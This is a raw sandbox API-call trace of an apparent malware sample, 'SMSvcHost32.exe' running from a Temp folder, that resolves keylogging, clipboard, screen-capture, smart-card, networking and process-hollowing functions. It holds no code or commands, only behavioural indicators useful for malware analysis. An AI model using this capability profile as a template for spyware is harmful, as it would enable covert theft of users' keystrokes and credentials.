	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityInfo") returned 0x74ac05f0
	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityInfo") returned 0x74abfbe0
	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclA") returned 0x74ac3cc0
	[0082.335] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0082.335] GetProcAddress (hModule=0x74aa0000, lpProcName="ReportEventA") returned 0x74ad37a0
	[0082.335] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0082.335] GetProcAddress (hModule=0x77810000, lpProcName="DispatchMessageW") returned 0x778262e0
	[0082.335] GetProcAddress (hModule=0x77810000, lpProcName="LoadCursorW") returned 0x7782abd0
	[0082.335] GetProcAddress (hModule=0x77810000, lpProcName="ToUnicodeEx") returned 0x77892420
	[0082.336] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0082.336] GetProcAddress (hModule=0x77810000, lpProcName="CallNextHookEx") returned 0x77823550
	[0082.336] GetProcAddress (hModule=0x77810000, lpProcName="GetKeyState") returned 0x7782ddd0
	[0082.336] GetProcAddress (hModule=0x77810000, lpProcName="GetMessageW") returned 0x77844f60
	[0082.336] GetProcAddress (hModule=0x77810000, lpProcName="CloseClipboard") returned 0x778495c0
	[0082.337] GetProcAddress (hModule=0x77810000, lpProcName="MapVirtualKeyA") returned 0x77843e20
	[0082.337] GetProcAddress (hModule=0x77810000, lpProcName="DrawIcon") returned 0x7783f6e0
	[0082.337] GetProcAddress (hModule=0x77810000, lpProcName="GetIconInfo") returned 0x77840160
	[0082.337] GetProcAddress (hModule=0x77810000, lpProcName="DefWindowProcW") returned 0x779eaee0
	[0082.337] GetProcAddress (hModule=0x77810000, lpProcName="SetClipboardViewer") returned 0x77849a80
	[0082.337] GetProcAddress (hModule=0x77810000, lpProcName="SendMessageW") returned 0x77825d90
	[0082.338] GetProcAddress (hModule=0x77810000, lpProcName="UnhookWindowsHookEx") returned 0x77848fe0
	[0082.338] GetProcAddress (hModule=0x77810000, lpProcName="OpenClipboard") returned 0x77843920
	[0082.338] GetProcAddress (hModule=0x77810000, lpProcName="SetWindowsHookExW") returned 0x7782fb10
	[0082.338] GetProcAddress (hModule=0x77810000, lpProcName="CreateWindowExW") returned 0x77829860
	[0082.338] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowTextW") returned 0x7783cb20
	[0082.338] GetProcAddress (hModule=0x77810000, lpProcName="GetClipboardData") returned 0x77842bf0
	[0082.339] GetProcAddress (hModule=0x77810000, lpProcName="GetProcessWindowStation") returned 0x77848b10
	[0082.339] GetProcAddress (hModule=0x77810000, lpProcName="MessageBoxA") returned 0x7788fec0
	[0082.339] GetProcAddress (hModule=0x77810000, lpProcName="GetUserObjectInformationW") returned 0x77848fa0
	[0082.339] GetProcAddress (hModule=0x77810000, lpProcName="GetMessageA") returned 0x7783e130
	[0082.339] GetProcAddress (hModule=0x77810000, lpProcName="MapVirtualKeyW") returned 0x77843c80
	[0082.339] GetProcAddress (hModule=0x77810000, lpProcName="DispatchMessageA") returned 0x77846f10
	[0082.340] GetProcAddress (hModule=0x77810000, lpProcName="IsCharAlphaNumericW") returned 0x7789ac00
	[0082.340] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0082.340] GetProcAddress (hModule=0x77810000, lpProcName="GetCursorPos") returned 0x7783f6c0
	[0082.340] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0082.340] GetProcAddress (hModule=0x77810000, lpProcName="CharLowerW") returned 0x7789ab20
	[0082.340] GetProcAddress (hModule=0x77810000, lpProcName="GetKeyboardState") returned 0x77849060
	[0082.341] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0082.341] GetProcAddress (hModule=0x77810000, lpProcName="RegisterClassExW") returned 0x77829580
	[0082.341] GetProcAddress (hModule=0x77810000, lpProcName="GetKeyboardLayout") returned 0x7782ef20
	[0082.341] GetProcAddress (hModule=0x77810000, lpProcName="GetAsyncKeyState") returned 0x7782e820
	[0082.341] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x772c0000
	[0082.341] GetProcAddress (hModule=0x772c0000, lpProcName="GetModuleFileNameExW") returned 0x772c13e0
	[0082.342] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessMemoryInfo") returned 0x772c16c0
	[0082.342] GetProcAddress (hModule=0x772c0000, lpProcName="GetModuleFileNameExA") returned 0x772c1660
	[0082.342] GetProcAddress (hModule=0x772c0000, lpProcName="EnumProcessModules") returned 0x772c1360
	[0082.342] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x746c0000
	[0082.342] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName="WSAEnumProtocolsW") returned 0x746d7ed0
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName=0x16) returned 0x746d4970
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName="WSAIoctl") returned 0x746d2f70
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName=0x5) returned 0x746d48b0
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName=0x4) returned 0x746d6090
	[0082.343] GetProcAddress (hModule=0x746c0000, lpProcName=0x8) returned 0x746c4ab0
	[0082.344] GetProcAddress (hModule=0x746c0000, lpProcName=0x9) returned 0x746c4a90
	[0082.344] GetProcAddress (hModule=0x746c0000, lpProcName=0xd) returned 0x746d5f50
	[0082.344] GetProcAddress (hModule=0x746c0000, lpProcName=0x10) returned 0x746d1d20
	[0082.344] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0082.344] GetProcAddress (hModule=0x746c0000, lpProcName=0x15) returned 0x746cecc0
	[0082.344] GetProcAddress (hModule=0x746c0000, lpProcName=0x70) returned 0x746c5a10
	[0082.345] GetProcAddress (hModule=0x746c0000, lpProcName=0x7) returned 0x746d3e40
	[0082.345] GetProcAddress (hModule=0x746c0000, lpProcName="WSASocketW") returned 0x746ce7d0
	[0082.345] GetProcAddress (hModule=0x746c0000, lpProcName="WSASendTo") returned 0x746d7f90
	[0082.345] GetProcAddress (hModule=0x746c0000, lpProcName=0x6) returned 0x746d3830
	[0082.345] GetProcAddress (hModule=0x746c0000, lpProcName="WSARecvFrom") returned 0x746d8090
	[0082.345] GetProcAddress (hModule=0x746c0000, lpProcName="WSARecv") returned 0x746d2c50
	[0082.346] GetProcAddress (hModule=0x746c0000, lpProcName=0xa) returned 0x746ce180
	[0082.346] GetProcAddress (hModule=0x746c0000, lpProcName=0x12) returned 0x746d1f00
	[0082.346] GetProcAddress (hModule=0x746c0000, lpProcName="GetNameInfoW") returned 0x746d4050
	[0082.346] GetProcAddress (hModule=0x746c0000, lpProcName="GetAddrInfoW") returned 0x746d2180
	[0082.346] GetProcAddress (hModule=0x746c0000, lpProcName="FreeAddrInfoW") returned 0x746d5ee0
	[0082.346] GetProcAddress (hModule=0x746c0000, lpProcName="WSADuplicateSocketW") returned 0x746efca0
	[0082.347] GetProcAddress (hModule=0x746c0000, lpProcName="WSASend") returned 0x746d2de0
	[0082.347] GetProcAddress (hModule=0x746c0000, lpProcName=0xe) returned 0x746c4ab0
	[0082.347] GetProcAddress (hModule=0x746c0000, lpProcName=0x97) returned 0x746c47e0
	[0082.347] GetProcAddress (hModule=0x746c0000, lpProcName=0x11) returned 0x746d7370
	[0082.347] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0082.347] GetProcAddress (hModule=0x746c0000, lpProcName="WSCGetProviderPath") returned 0x746fde80
	[0082.348] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0082.348] GetProcAddress (hModule=0x746c0000, lpProcName=0x39) returned 0x746f12a0
	[0082.348] GetProcAddress (hModule=0x746c0000, lpProcName=0x6f) returned 0x746c4f60
	[0082.348] GetProcAddress (hModule=0x746c0000, lpProcName=0xc) returned 0x746d59f0
	[0082.348] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0082.348] GetProcAddress (hModule=0x746c0000, lpProcName=0x13) returned 0x746d1b90
	[0082.349] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0082.349] GetModuleHandleA (lpModuleName="GDI32.dll") returned 0x76f00000
	[0082.349] GetProcAddress (hModule=0x76f00000, lpProcName="BitBlt") returned 0x76f82230
	[0082.349] GetProcAddress (hModule=0x76f00000, lpProcName="GetDeviceCaps") returned 0x76f80fe0
	[0082.349] GetProcAddress (hModule=0x76f00000, lpProcName="CreateDCW") returned 0x76fb2ab0
	[0082.349] GetProcAddress (hModule=0x76f00000, lpProcName="DeleteObject") returned 0x76f80810
	[0082.350] GetProcAddress (hModule=0x76f00000, lpProcName="SelectObject") returned 0x76f80440
	[0082.350] GetProcAddress (hModule=0x76f00000, lpProcName="CreateCompatibleBitmap") returned 0x76f82390
	[0082.350] GetProcAddress (hModule=0x76f00000, lpProcName="DeleteDC") returned 0x76f80d00
	[0082.350] GetProcAddress (hModule=0x76f00000, lpProcName="GetDIBits") returned 0x76f81580
	[0082.350] GetProcAddress (hModule=0x76f00000, lpProcName="CreateCompatibleDC") returned 0x76f82050
	[0082.350] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0082.351] GetProcAddress (hModule=0x77960000, lpProcName="RtlUnwind") returned 0x779c33a0
	[0082.351] GetProcAddress (hModule=0x77960000, lpProcName="memmove") returned 0x779dcc90
	[0082.351] GetProcAddress (hModule=0x77960000, lpProcName="wcschr") returned 0x779de7a0
	[0082.351] GetProcAddress (hModule=0x77960000, lpProcName="_stricmp") returned 0x779db580
	[0082.351] GetProcAddress (hModule=0x77960000, lpProcName="strncmp") returned 0x779ddea0
	[0082.351] GetProcAddress (hModule=0x77960000, lpProcName="memchr") returned 0x779dc820
	[0082.352] GetProcAddress (hModule=0x77960000, lpProcName="strncpy") returned 0x779ddf60
	[0082.352] GetProcAddress (hModule=0x77960000, lpProcName="strstr") returned 0x779de1a0
	[0082.352] GetProcAddress (hModule=0x77960000, lpProcName="_aullrem") returned 0x779da880
	[0082.352] GetProcAddress (hModule=0x77960000, lpProcName="strcspn") returned 0x779ddc80
	[0082.352] GetProcAddress (hModule=0x77960000, lpProcName="wcsstr") returned 0x779deaa0
	[0082.352] GetProcAddress (hModule=0x77960000, lpProcName="strchr") returned 0x779ddb20
	[0082.353] GetProcAddress (hModule=0x77960000, lpProcName="wcsrchr") returned 0x779dea00
	[0082.353] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0082.353] GetProcAddress (hModule=0x77960000, lpProcName="strrchr") returned 0x779de110
	[0082.353] GetProcAddress (hModule=0x77960000, lpProcName="VerSetConditionMask") returned 0x779c1a40
	[0082.353] GetProcAddress (hModule=0x77960000, lpProcName="NtUnmapViewOfSection") returned 0x779d6f40
	[0082.353] GetProcAddress (hModule=0x77960000, lpProcName="ZwClose") returned 0x779d6d70
	[0082.354] GetProcAddress (hModule=0x77960000, lpProcName="NtCreateSection") returned 0x779d7140
	[0082.354] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryVirtualMemory") returned 0x779d6ed0
	[0082.354] GetModuleHandleA (lpModuleName="WinSCard.dll") returned 0x0
	[0082.354] LoadLibraryA (lpLibFileName="WinSCard.dll") returned 0x6fe20000
	[0082.788] GetProcAddress (hModule=0x6fe20000, lpProcName="SCardEstablishContext") returned 0x6fe2c590
	[0082.788] GetProcAddress (hModule=0x6fe20000, lpProcName="SCardFreeMemory") returned 0x6fe2c9c0
	[0082.788] GetProcAddress (hModule=0x6fe20000, lpProcName="SCardDisconnect") returned 0x6fe2c410
	[0082.788] GetProcAddress (hModule=0x6fe20000, lpProcName="SCardListReadersA") returned 0x6fe31ff0
	[0082.788] GetProcAddress (hModule=0x6fe20000, lpProcName="SCardConnectA") returned 0x6fe30e30
	[0082.789] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0082.789] GetProcAddress (hModule=0x765a0000, lpProcName="DecodePointer") returned 0x779bd830
	[0082.789] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleExW") returned 0x765ba2b0
	[0082.789] GetProcAddress (hModule=0x765a0000, lpProcName="EncodePointer") returned 0x779bf730
	[0082.789] GetProcAddress (hModule=0x765a0000, lpProcName="GetCPInfo") returned 0x765ba290
	[0082.790] GetProcAddress (hModule=0x765a0000, lpProcName="IsProcessorFeaturePresent") returned 0x765b9bf0
	[0082.790] GetProcAddress (hModule=0x765a0000, lpProcName="SetStdHandle") returned 0x765e2430
	[0082.790] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileAttributesW") returned 0x765c6c20
	[0082.790] GetProcAddress (hModule=0x765a0000, lpProcName="GetConsoleCP") returned 0x765c6f60
	[0082.790] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x765c5c30
	[0082.791] GetProcAddress (hModule=0x765a0000, lpProcName="ReadConsoleInputA") returned 0x765c6fc0
	[0082.791] GetProcAddress (hModule=0x765a0000, lpProcName="RaiseException") returned 0x765b8c20
	[0082.791] GetProcAddress (hModule=0x765a0000, lpProcName="IsValidCodePage") returned 0x765ba790
	[0082.791] GetProcAddress (hModule=0x765a0000, lpProcName="GetACP") returned 0x765b8500
	[0082.791] GetProcAddress (hModule=0x765a0000, lpProcName="GetOEMCP") returned 0x765c5140
	[0082.791] GetProcAddress (hModule=0x765a0000, lpProcName="GetDriveTypeW") returned 0x765c6a10
	[0082.792] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileExW") returned 0x765c6940
	[0082.792] GetProcAddress (hModule=0x765a0000, lpProcName="GetStringTypeW") returned 0x765b7950
	[0082.792] GetProcAddress (hModule=0x765a0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x765c6730
	[0082.792] GetProcAddress (hModule=0x765a0000, lpProcName="IsDebuggerPresent") returned 0x765bb0b0
	[0082.792] GetProcAddress (hModule=0x765a0000, lpProcName="UnhandledExceptionFilter") returned 0x765e2670
	[0082.792] GetProcAddress (hModule=0x765a0000, lpProcName="GetDateFormatW") returned 0x765bf7f0
	[0082.793] GetProcAddress (hModule=0x765a0000, lpProcName="GetTimeFormatW") returned 0x765bfd90
	[0082.793] GetProcAddress (hModule=0x765a0000, lpProcName="CompareStringW") returned 0x765c2630
	[0082.793] GetProcAddress (hModule=0x765a0000, lpProcName="GetLocaleInfoW") returned 0x765bcd70
	[0082.793] GetProcAddress (hModule=0x765a0000, lpProcName="IsValidLocale") returned 0x765bab40
	[0082.793] GetProcAddress (hModule=0x765a0000, lpProcName="GetUserDefaultLCID") returned 0x765c2920
	[0082.793] GetProcAddress (hModule=0x765a0000, lpProcName="EnumSystemLocalesW") returned 0x765bff10
	[0082.794] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0082.794] GetProcAddress (hModule=0x765a0000, lpProcName="FlushConsoleInputBuffer") returned 0x765c7080
	[0082.794] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0082.794] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatus") returned 0x765b8e00
	[0082.794] GetProcAddress (hModule=0x765a0000, lpProcName="GetWindowsDirectoryA") returned 0x765bb060
	[0082.795] GetProcAddress (hModule=0x765a0000, lpProcName="DebugBreak") returned 0x765e0920
	[0082.795] GetProcAddress (hModule=0x765a0000, lpProcName="ReadConsoleInputW") returned 0x765c6fd0
	[0082.795] GetProcAddress (hModule=0x765a0000, lpProcName="GetConsoleCursorInfo") returned 0x765c70b0
	[0082.795] GetProcAddress (hModule=0x765a0000, lpProcName="FillConsoleOutputAttribute") returned 0x765c7050
	[0082.795] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleCursorInfo") returned 0x765c71a0
	[0082.795] GetProcAddress (hModule=0x765a0000, lpProcName="GetConsoleScreenBufferInfo") returned 0x765c70c0
	[0082.796] GetProcAddress (hModule=0x765a0000, lpProcName="FillConsoleOutputCharacterW") returned 0x765c7070
	[0082.796] GetProcAddress (hModule=0x765a0000, lpProcName="WriteConsoleW") returned 0x765c7020
	[0082.796] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleCursorPosition") returned 0x765c71b0
	[0082.796] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleMode") returned 0x765c7000
	[0082.796] GetProcAddress (hModule=0x765a0000, lpProcName="ReadConsoleW") returned 0x765c6fe0
	[0082.796] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleTextAttribute") returned 0x765c71f0
	[0082.797] GetProcAddress (hModule=0x765a0000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x765c6f90
	[0082.797] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0082.797] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0082.797] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0082.797] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0082.797] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0082.798] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0082.798] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0082.798] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0082.798] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0082.798] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileA") returned 0x765c6880
	[0082.799] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0082.799] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0082.799] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0082.799] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0082.799] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentStringsW") returned 0x765baac0
	[0082.825] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0082.825] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsA") returned 0x765c5dd0
	[0082.825] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0082.825] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0082.826] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageW") returned 0x765c4f80
	[0082.826] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatA") returned 0x765bf640
	[0082.826] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0082.826] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0082.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0082.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameA") returned 0x765ba720
	[0082.827] GetProcAddress (hModule=0x765a0000, lpProcName="FreeEnvironmentStringsW") returned 0x765ba7e0
	[0082.827] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0082.827] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0082.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0082.827] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0082.828] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0082.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0082.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetVolumeInformationA") returned 0x765c6b40
	[0082.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0082.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0082.829] GetProcAddress (hModule=0x765a0000, lpProcName="SetUnhandledExceptionFilter") returned 0x765ba940
	[0082.829] GetProcAddress (hModule=0x765a0000, lpProcName="SetEvent") returned 0x765c67d0
	[0082.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0082.829] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0082.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineA") returned 0x765bab60
	[0082.830] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0082.830] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadCodePtr") returned 0x765bd0e0
	[0082.830] GetProcAddress (hModule=0x765a0000, lpProcName="SetLastError") returned 0x765b2af0
	[0082.830] GetProcAddress (hModule=0x765a0000, lpProcName="DisableThreadLibraryCalls") returned 0x765ba860
	[0082.830] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessWorkingSetSize") returned 0x765c0120
	[0082.830] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThreadId") returned 0x765b1b90
	[0082.831] GetProcAddress (hModule=0x765a0000, lpProcName="HeapDestroy") returned 0x765c4c30
	[0082.831] GetProcAddress (hModule=0x765a0000, lpProcName="HeapCreate") returned 0x765ba100
	[0082.831] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0082.831] GetProcAddress (hModule=0x765a0000, lpProcName="FileTimeToDosDateTime") returned 0x765c2930
	[0082.831] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0082.832] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0082.832] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryW") returned 0x765ba840
	[0082.832] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0082.832] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameA") returned 0x765c6b00
	[0082.832] GetProcAddress (hModule=0x765a0000, lpProcName="FileTimeToLocalFileTime") returned 0x765c68d0
	[0082.832] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileInformationByHandle") returned 0x765c6a60
	[0082.833] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathA") returned 0x765c6b20
	[0082.833] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileA") returned 0x765c68b0
	[0082.833] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0082.833] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0082.833] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0082.833] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0082.834] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0082.834] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0082.834] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0082.834] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0082.835] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75120000
	[0082.835] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x771d0000
	[0082.835] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0082.835] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x702b0000
	[0082.836] GetModuleHandleA (lpModuleName="CRYPT32.dll") returned 0x77050000
	[0082.836] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x77490000
	[0082.855] GetModuleHandleA (lpModuleName="IPHLPAPI.DLL") returned 0x71d30000
	[0082.855] GetModuleHandleA (lpModuleName="WINMM.dll") returned 0x0
	[0082.855] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x6fdc0000
	[0083.587] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x701e0000
	[0083.587] GetModuleHandleA (lpModuleName="OLEAUT32.dll") returned 0x76b60000
	[0083.587] GetProcAddress (hModule=0x76b60000, lpProcName=0xc8) returned 0x76b99590
	[0083.588] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x203fcf0 | out: lpSystemTimeAsFileTime=0x203fcf0*(dwLowDateTime=0x6367fdde, dwHighDateTime=0x1d492ec)) 
	[0083.588] GetCurrentThreadId () returned 0x560
	[0083.588] GetCurrentProcessId () returned 0xdb8
	[0083.588] QueryPerformanceCounter (in: lpPerformanceCount=0x203fce8 | out: lpPerformanceCount=0x203fce8*=1816609500000) returned 1
	[0083.588] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.589] GetProcAddress (hModule=0x765a0000, lpProcName="FlsAlloc") returned 0x765ba980
	[0083.589] GetProcAddress (hModule=0x765a0000, lpProcName="FlsFree") returned 0x765c4ff0
	[0083.589] GetProcAddress (hModule=0x765a0000, lpProcName="FlsGetValue") returned 0x765b7570
	[0083.589] GetProcAddress (hModule=0x765a0000, lpProcName="FlsSetValue") returned 0x765b9e30
	[0083.589] GetProcAddress (hModule=0x765a0000, lpProcName="InitializeCriticalSectionEx") returned 0x765c6740
	[0083.590] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventExW") returned 0x765c66a0
	[0083.590] GetProcAddress (hModule=0x765a0000, lpProcName="CreateSemaphoreExW") returned 0x765c6700
	[0083.590] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadStackGuarantee") returned 0x765bb040
	[0083.590] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThreadpoolTimer") returned 0x765bace0
	[0083.590] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadpoolTimer") returned 0x779a7dc0
	[0083.591] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779b4010
	[0083.591] GetProcAddress (hModule=0x765a0000, lpProcName="CloseThreadpoolTimer") returned 0x779b2a50
	[0083.591] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThreadpoolWait") returned 0x765ba7b0
	[0083.591] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadpoolWait") returned 0x779b2290
	[0083.591] GetProcAddress (hModule=0x765a0000, lpProcName="CloseThreadpoolWait") returned 0x779b2910
	[0083.591] GetProcAddress (hModule=0x765a0000, lpProcName="FlushProcessWriteBuffers") returned 0x779d7a60
	[0083.592] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779cac00
	[0083.592] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessorNumber") returned 0x779ba890
	[0083.592] GetProcAddress (hModule=0x765a0000, lpProcName="GetLogicalProcessorInformation") returned 0x765bac80
	[0083.592] GetProcAddress (hModule=0x765a0000, lpProcName="CreateSymbolicLinkW") returned 0x765e0830
	[0083.592] GetProcAddress (hModule=0x765a0000, lpProcName="SetDefaultDllDirectories") returned 0x775f6270
	[0083.593] GetProcAddress (hModule=0x765a0000, lpProcName="EnumSystemLocalesEx") returned 0x765bfe80
	[0083.593] GetProcAddress (hModule=0x765a0000, lpProcName="CompareStringEx") returned 0x765bff80
	[0083.593] GetProcAddress (hModule=0x765a0000, lpProcName="GetDateFormatEx") returned 0x765e0e00
	[0083.593] GetProcAddress (hModule=0x765a0000, lpProcName="GetLocaleInfoEx") returned 0x765ba750
	[0083.593] GetProcAddress (hModule=0x765a0000, lpProcName="GetTimeFormatEx") returned 0x765e1240
	[0083.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetUserDefaultLocaleName") returned 0x765bad60
	[0083.594] GetProcAddress (hModule=0x765a0000, lpProcName="IsValidLocaleName") returned 0x765e1460
	[0083.594] GetProcAddress (hModule=0x765a0000, lpProcName="LCMapStringEx") returned 0x765b9a10
	[0083.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentPackageId") returned 0x7757ded0
	[0083.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount64") returned 0x765b3630
	[0083.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileInformationByHandleExW") returned 0x0
	[0083.595] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileInformationByHandleW") returned 0x0
	[0083.595] GetCurrentThreadId () returned 0x560
	[0083.595] GetCommandLineA () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0083.595] GetEnvironmentStringsW () returned 0x31a59c0*
